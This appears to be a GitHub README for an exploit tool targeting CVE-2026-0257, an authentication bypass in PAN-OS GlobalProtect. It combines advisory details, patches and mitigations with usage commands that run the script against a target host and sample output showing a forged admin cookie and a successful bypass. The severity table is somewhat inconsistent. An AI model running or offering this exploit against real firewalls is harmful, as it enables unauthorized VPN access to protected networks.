0xBlackash/CVE-2026-0257

## 📌 Overview **CVE-2026-0257** is an **authentication bypass vulnerability** affecting the GlobalProtect portal and gateway components of Palo Alto Networks PAN-OS software. An unauthenticated remote attacker can bypass security restrictions and establish an **unauthorized VPN connection** to affected firewalls. ## ⚠️ Severity & Scoring | Metric | Score | Rating | |---------------------|------------------------|-------------| | **CVSS v4.0** | 7.8 / 4.7 | **High** / Medium | | **CVSS v3.x** | Up to 9.8 | **Critical** | | **Urgency** | **HIGHEST** | - | **Vector (CVSS 4.0 example)**: `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:H/SA:N` ## 📖 Description Authentication bypass vulnerabilities in the GlobalProtect portal and gateway of Palo Alto Networks PAN-OS® software allow the attacker to bypass security restrictions and establish an unauthorized VPN connection. The issue stems from **CWE-565: Reliance on Cookies without Validation and Integrity Checking**. ## 🛠 Affected Products - **PAN-OS** versions prior to fixed releases (10.2, 11.1, 11.2, 12.1) - **Prisma Access** (specific versions) - Firewalls with **GlobalProtect** portal or gateway configured **Not Affected**: - Panorama - Cloud NGFW ## 🔍 Vulnerable Configuration This vulnerability **requires** the following configuration to be exploitable: 1. GlobalProtect portal **or** gateway is configured 2. **Authentication override cookies** are enabled 3. The authentication override cookie encryption/decryption certificate is **reused** with another feature ## 💥 Impact - **Unauthorized VPN access** to internal networks - Potential lateral movement by attackers - Bypass of multi-factor authentication (in certain setups) - Significant risk to enterprise perimeters **High impact on confidentiality and integrity** of protected networks. ## 🔥 Exploitation Status - **Actively Exploited** in the wild (as of May 17, 2026) - Rapid7 observed successful exploitation - Palo Alto Networks confirmed limited exploit attempts - Added to **CISA Known Exploited Vulnerabilities (KEV)** catalog on May 29, 2026 ## ⚙️ Usage: python3 CVE-2026-0257.py --target vpn.company.com python3 CVE-2026-0257.py --target 192.168.1.100 --user administrator --verbose ## ✅ Expected Successful Output: ╔══════════════════════════════════════════════════════════════╗ ║ CVE-2026-0257 - GlobalProtect Auth Bypass ║ ║ Public Key Cookie Forging Exploit ║ ║ Author: 0xBlackash ║ ╚══════════════════════════════════════════════════════════════╝ [*] Connecting to vpn.company.com:443 to extract certificate chain... [+] Found 2048-bit RSA key [*] Forging authentication cookie for user: admin [1/1] Trying public key... Cookie (first 60 chars): eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9... [+] SUCCESS! Authentication Bypass Achieved! Username : admin Cookie : eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9... ## ✅ Patches & Fixes **Fixed Versions** (apply **urgently**): | PAN-OS Version | Fixed Release | |----------------|--------------------------------| | 12.1 | ≥ 12.1.4-h6, ≥ 12.1.7 | | 11.2 | ≥ 11.2.4-h17, ≥ 11.2.7-h14, etc. | | 11.1 | ≥ 11.1.4-h33, ≥ 11.1.7-h6, etc. | | 10.2 | ≥ 10.2.7-h34, ≥ 10.2.10-h36, etc. | **Prisma Access** also has corresponding fixed versions. ## 🛡️ Mitigations **Immediate Workarounds** (if patching not possible): - Disable **authentication override cookies** if not required - Avoid certificate reuse for GlobalProtect authentication override - Monitor GlobalProtect logs for suspicious VPN connections - Restrict management access and enable strict security policies ## 🔗 References - [Official Palo Alto Networks Advisory](https://security.paloaltonetworks.com/CVE-2026-0257) - [NVD Detail](https://nvd.nist.gov/vuln/detail/CVE-2026-0257) - [Rapid7 Analysis](https://www.rapid7.com/blog/post/etr-rapid7-observed-exploitation-of-pan-os-globalprotect-authentication-bypass-vulnerability-cve-2026-0257) - [CISA KEV Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) ## 📅 Timeline | Date | Event | |-------------------|-------| | **2026-05-13** | CVE Published + Initial Advisory | | **2026-05-17** | Exploitation observed in the wild | | **2026-05-29** | Palo Alto update + CISA KEV addition | | **2026-05-30** | This Report |